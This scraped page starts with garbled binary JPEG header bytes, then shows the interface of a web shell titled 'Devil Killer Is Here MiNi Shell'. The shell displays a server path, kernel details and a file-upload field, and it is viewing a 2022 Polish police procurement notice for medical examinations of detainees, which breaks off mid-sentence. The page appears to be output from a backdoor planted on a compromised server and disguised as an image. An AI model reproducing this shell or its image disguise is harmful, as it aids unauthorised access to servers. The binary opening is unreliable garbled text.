JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220505/0014502801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ZP-2380-128/2022 Świadczenie usług lekarskich na rzecz osób zatrzymanych/doprowadzonych przez Policję na rzecz KMP w Częstochowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji w Katowicach</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Zespół Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 270208292</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lompy 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-038</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">47/851-20-50</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@ka.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.slaska.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZP-2380-128/2022 Świadczenie usług lekarskich na rzecz osób zatrzymanych/doprowadzonych przez Policję na rzecz KMP w Częstochowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fd513944-c7a6-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00145028</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00066155/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.10 Świadczenie usług medycznych na rzecz osób zatrzymanych / doprowadzonych/ przez Policję na rzecz Komendy Miejskiej Policji w Częstochowie.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> slaska-policja.eb2b.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postepowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem Platformy zakupowej pod adresem:<br/>http://slaska-policja.eb2b.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2. W celu<br/>skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między<br/>Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz<br/>informacje, przekazywane były w formie elektronicznej za pośrednictwem https://slaskapolicja.eb2b.com.pl w zakładce „Pytania/Informacje”. Za datę przekazania (wpływu) oświadczeń,<br/>wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem<br/>https://slaska-policja.eb2b.com.pl. 3. Zamawiający będzie przekazywał Wykonawcom informacje w<br/>formie elektronicznej za pośrednictwem https://slaska-policja.eb2b.com.pl. Informacje dotyczące<br/>odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający<br/>będzie zamieszczał na platformie w sekcji “Załączniki”. Korespondencja, której zgodnie z<br/>obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie<br/>elektronicznej za pośrednictwem https://slaska-policja.eb2b.com.pl. do konkretnego Wykonawcy. 4.<br/>Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości<br/>bezpośrednio na platformazakupowa.pl przesłanych przez Zamawiającego, gdyż system powiadomień<br/>może ulec awarii lub powiadomienie może trafić do folderu SPAM. 5. Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30.12.2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U.<br/>2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.: a. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512 kb/s; b. Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB<br/>Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje; c. Zainstalowana dowolna przeglądarka internetowa, w przypadku Internet<br/>Explorer minimalnie wersja 10.0; d. Włączona obsługa JavaScript; e. Zainstalowany program Acrobat<br/>Reader lub inny obsługujący pliki w formacie .pdf. f. Dopuszczalny format przesyłanych danych tj.<br/>plików o wielkości do 50 MB w formatach: .pdf g. Plik załączony przez Wykonawcę na Platformie<br/>Zakupowej i zapisany, jest w Systemie zaszyfrowany. Możliwość otworzenia pliku dostępna jest<br/>dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert. h. Oznaczenie<br/>czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz<br/>dokładny czas (hh:mm:ss), znajdującą się po lewej stronie dokumentu w kolumnie „Data przesłania”. 6.<br/>Poniżej została określona instrukcja korzystania z Platformy, tj.: a. zgłoszenie do postępowania<br/>wymaga zalogowania Wykonawcy do Systemu. Po wprowadzeniu danych użytkownika tj. adresu email oraz hasła zgłoszenie jest automatycznie akceptowane przez system. b. w zakładce<br/>„Postępowania”, „Lista postępowań otwartych” należy wybrać niniejsze postępowanie oraz korzystając<br/>z polecenia „zgłoś się do udziału w postępowaniu” przejść do Formularza rejestracyjnego – w<br/>przypadku, gdy Wykonawca nie posiada konta na Platformie lub panelu logowania użytkownika do<br/>Systemu. c. po wypełnieniu Formularza rejestracyjnego Wykonawca otrzyma e-maila informującego, że<br/>może dokonać pierwszego logowania do Platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KLAUZULA INFORMACYJNA KOMENDY<br/>WOJEWÓDZKIEJ POLICJI W KATOWICACH dla uczestników postępowań o udzielenie zamówień<br/>publicznych, Wykonawców oraz innych osób których dane osobowe pozyskano w związku z<br/>ubieganiem się o udzielenie zamówienia bądź w związku z realizacją zamówienia przez Wykonawcę.<br/>Pouczenie wynikające z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z<br/>dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119). Zgodnie z Sekcją XXV- RODO SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-2380-128/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług lekarskich na rzecz osób zatrzymanych/doprowadzonych przez Policję na rzecz KMP w Częstochowie<br/>2.	Szczegółowe informacje dotyczące opisu przedmiotu zamówienia i jego zakresu znajdują się w: a)	załącznik nr 1 – Formularz ofertowy, b)	załącznik nr 2 – Wzór umowy, c)	załącznik nr 3 – Opis Przedmiotu Zamówienia<br/>d)	załącznik nr 4 – Oświadczenie o braku podstaw do wykluczenia i spełnianiu warunków udziału w postępowaniu e)	załącznik nr 5 – Zobowiązanie innego podmiotu (jeżeli dotyczy). 4.	Przedmiotem zamówienia jest całodobowe świadczenie usług medycznych wobec osób doprowadzanych przez funkcjonariuszy do miejsca wykonywania badań, w tym: a)	Wykonanie badania lekarskiego osoby doprowadzonej przez Policję do miejsca wykonywania badań. b)	W przypadku konieczności, w ramach przeprowadzonego badania wystawienie zaświadczenia lekarskiego o braku lub istnieniu przeciwwskazań do przebywania w pomieszczeniu dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pokoju przejściowym, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich lub zakładzie poprawczym , a także (w przypadkach koniecznych) opatrzenie ran i wystawienie recepty na niezbędne leki oraz określenie ich dawkowania - wydanie zaświadczenia jest częścią integralną badania, a Wykonawcy będzie przysługiwać w tym przypadku wynagrodzenie w wysokości ceny badania lekarskiego; c)	Pobrania krwi do pakietu do pobrania próbek krwi dostarczonego przez funkcjonariusza (bez badań analitycznych) oraz sporządzenia protokołu pobrania krwi. Usługa ta zostanie wykonana na żądanie funkcjonariusza. d)	Pobrania innego materiału biologicznego (np. ślina, mocz, włosy, wyskrobiny spod paznokci) bez badań analitycznych oraz sporządzenie protokołu z tego pobrania. Usługa ta zostanie wykonana na żądanie funkcjonariusza. e)	W sytuacji gdy wyniknie konieczność, przeprowadzenie badania osoby doprowadzonej do miejsca wykonywania badań przez lekarza specjalistę tj.: wykonanie innego badania niż opisane w ppkt. a) , w tym przeprowadzenie takiego badania w zakresie niezbędnym do wydania zaświadczenia lekarskiego o braku lub istnieniu przeciwwskazań do umieszczenia osoby badanej w pomieszczeniu dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pokoju przejściowym, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich lub zakładzie poprawczym .<br/>5.	Badanie lekarskie na zlecenie Policji przewidziane jest w art. 15 ust. 5 ustawy z dnia 6 kwietnia 1990 r. (Dz. U. z 2022 r., poz. 1882 j.t. z póżn. zm.) oraz wydanym na podstawie art. 15 ust. 9 cytowanej ustawy rozporządzeniem Ministra Spraw Wewnętrznych z dnia 13 września 2012 r. (Dz. U. poz. 1102) w sprawie badań osób zatrzymanych przez Policję, w sytuacji: 	gdy osoba oświadcza, że cierpi na schorzenia wymagające stałego lub okresowego leczenia, którego przerwanie powodowałoby zagrożenie życia lub zdrowia, 	żąda przeprowadzenia badania lekarskiego, <br/>	podsiada widoczne obrażenia ciała niewskazujące na stan nagłego zagrożenia zdrowia, 	z posiadanych przez Policję informacji lub z okoliczności zatrzymania wynika, że osobą zatrzymaną jest: kobieta w ciąży, karmiąca piersią, osobą chorą zakaźnie, osobą z zaburzeniami psychicznymi, nieletni po spożyciu alkoholu lub innego, podobnie działającego środka, a także wydanym na podstawie art. 15 ust. 10 cytowanej ustawy rozporządzeniem Ministra Spraw Wewnętrznych z dnia 4 czerwca 2012 r. (Dz. U. poz. 638 z póżn. zm.) w sprawie pomieszczeń przeznaczonych dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoi przejściowych, tymczasowych pomieszczeń przejściowych i policyjnych izb dziecka, regulaminu pobytu w tych pomieszczeniach, pokojach i izbach oraz sposobu postępowania z zapisami obrazów z tych pomieszczeń, pokoi i izb. <br/>	osoba znajduje się po spożyciu alkoholu. 6.	Badanie lekarskie obejmuje także osoby doprowadzone do miejsca wykonywania badań w związku z czynnościami poza procesowymi (m.in.: zatrzymanie penitencjarne lub prewencyjne nie połączone z wszczęciem postępowań procesowych) lub gdy wyniknie konieczność, przeprowadzenie badania takiej osoby przez lekarza specjalistę. 7.	W sytuacjach gdy niezbędnym do wydania zaświadczenia o braku przeciwwskazań medycznych do przebywania osoby doprowadzonej w pomieszczeniach dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pokoju przejściowym, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich lub zakładzie poprawczym, konieczne jest przeprowadzenie konsultacji lekarzy specjalistów lub wykonanie (zlecenie) badań diagnostycznych, Wykonawca zobowiązany jest do przeprowadzenia bądź zlecenia tych konsultacji lub wykonania bądź zlecenia wykonania odpowiednich badań. Wykonawca ma obowiązek uzasadnić wykonanie dodatkowego badania czy konsultacji niezwłocznie po przeprowadzeniu takiego badania. Uzasadnienie należy złożyć w formie pisemnej na zleceniu przeprowadzenia badania (załącznik nr 2 do umowy). Brak uzasadnienia będzie stanowił podstawę do odmowy wypłaty należności za jego wykonanie. Koszt wykonania badania wynikał będzie z ceny wskazanej w cenniku obowiązującym u Wykonawcy lub placówce, w której będzie wykonane badanie. Zamawiający nie ponosi kosztów w przypadku, gdy w wyniku powyższych badań będą istniały przeciwwskazania do przebywania osoby doprowadzonej w pomieszczeniach dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pokoju przejściowym, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich lub zakładzie poprawczym i wystąpi konieczność hospitalizacji tej osoby. 8	Zgodnie z § 3 ust. 1 Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 13 września 2012 r. w sprawie badań lekarskich osób zatrzymanych przez Policję (Dz. U. poz. 1102), badania osób zatrzymanych mogą być wykonywane przez lekarza najbliższego Zakładu Opieki Zdrowotnej. W związku z powyższym Zakład Opieki Zdrowotnej w myśl ww. Rozporządzenia powinien być wpisany do rejestru podmiotów wykonujących działalność leczniczą, o którym mowa w art. 100 ustawy z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. z 2021 r. poz. 1773 j.t. z póżn. zm.) oraz być zlokalizowany w granicach administracyjnych Komendy Miejskiej Policji w Częstochowie lub w odległości do 35 km po trasie. •	Zamawiający wymaga oświadczenia o lokalizacji zakładu wykonującego działalność leczniczą dla oferowanego zadania tj. podania adresu (miejscowość, kod pocztowy, ulica, nr administracyjny budynku, lub nr działki podania). •	Adres KMP Częstochowa 42-200 Częstochowa, ul. księdza Jerzego Popiełuszki 5<br/>•	Na etapie badania oferty Zamawiający zweryfikuje oferowaną przez Wykonawcę odległość i w przypadku gdy oferowana odległość przekroczy 35 km od granic administracyjnych na które Wykonawca składa ofertę, Zamawiający odrzuci ofertę Wykonawcy jako niezgodną z warunkami zamówienia na podstawie art. 226 ust 1 pkt. 5 ustawy Pzp 6.	Uzasadnienie odmowy wydania zgody na umieszczenie zatrzymanego w PDOZ winno być w formie pisemnej. 7.	Świadczenie usług winno odbywać się przez całą dobę, bez względu na dzień tygodnia, poza kolejnością wynikającą z procedury przyjęć pacjentów (z wyłączeniem przyjęć pacjentów, których życiu zagraża niebezpieczeństwo). 8.	Szacunkowa ilość osób przewidzianych do badania określona została w załączniku nr 1 do SWZ ( Formularz ofertowy). Faktyczna ilość zlecanych usług wynikać będzie z rzeczywistych potrzeb w tym zakresie. 9.	Wybór najkorzystniejszej oferty odbędzie się na podstawie kryteriów określonych w Rozdziale XX SWZ.<br/>10.	Zamawiający będzie badał czy oferta nie zawiera rażąco niskiej ceny na podstawie ceny oferty wynikającej z załącznika nr 1 do SWZ. <br/>11.	Zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane. 12.	Wykonawca zapewni ochronę przekazywanych danych osobowych, zgodnie z ustawą o ochronie danych osobowych i Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych (dalej RODO). Obowiązek poinformowania podwykonawców, podmiotów trzecich i członków konsorcjum o przetwarzaniu danych osobowych spoczywa na Wykonawcy.<br/>13.	UWAGA: Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie ze złożoną ofertą. Maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na realizację zamówienia podaną na otwarciu ofert. Ilość świadczonych usług wskazana w formularzu ofertowym – załącznik nr 1 do SWZ została przez Zamawiającego przyjęta szacunkowo w celu wyliczenia przez Wykonawcę ceny oferty i nie może być podstawą roszczeń ze strony Wykonawcy w przypadku innej liczby zleceń w trakcie realizacji umowy. Cena oferty brutto obliczona wg Sekcji VII SWZ, wpisana do załącznika nr 1 do SWZ - formularza ofertowego posłuży Zamawiającemu do wyboru najkorzystniejszej oferty. Jeżeli cena oferty najkorzystniejszej przekroczy wartość podaną na otwarciu ofert, Zamawiający podejmie decyzję czy będzie zawierał umowę do wysokości posiadanych środków, czy unieważni postępowanie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121000-3 - Usługi medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze najkorzystniejszą ofertę spośród ofert<br/>niepodlegających odrzuceniu dla zadania 1 - 33 na podstawie kryterium Cena oferty brutto – 90<br/>%Odległość – 10 % 2. Ocena ofertY = A+BY – Suma punktów badanej ważnej oferty dla zadaniaA –<br/>Cena brutto oferty – 90 pktB – Odległość – 10 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.2. Uprawnień do wykonywania określonej działalności gospodarczej lub zawodowej, o ile<br/>wnika to z odrębnych przepisówWykonawca spełni warunek jeżeli wykaże, że dla każdego z<br/>oferowanych przez siebie zadań posiada dokument potwierdzający, że jest wpisany do jednego<br/>z rejestrów zawodowych lub handlowych, prowadzonych w państwie członkowskim Unii Europejskiej, w którym Wykonawca ma siedzibę lub miejsce zamieszkania tj. wpis do rejestru<br/>podmiotów wykonujących działalność leczniczą - zgodnie z art. 100 ustawy z dnia 15 kwietnia<br/>2011 r. o działalności leczniczej (Dz. U. z 2020 r. poz. 295 t.j. z póżn. zm.) Na potwierdzenie<br/>spełniania tego warunku Zamawiający żąda dołączenia do oferty: a) na podstawie art. 125 ust. 1<br/>ustawy Pzp – dołączenia do oferty oświadczenia o spełnieniu warunków udziału w postępowaniu<br/>– zgodnie ze wzorem stanowiącym załącznik nr 4 do SWZ b) dokument potwierdzający wpis do<br/>rejestru podmiotów wykonujących działalność leczniczą- - zgodnie z art. 100 ustawy z dnia 15<br/>kwietnia 2011 r. o 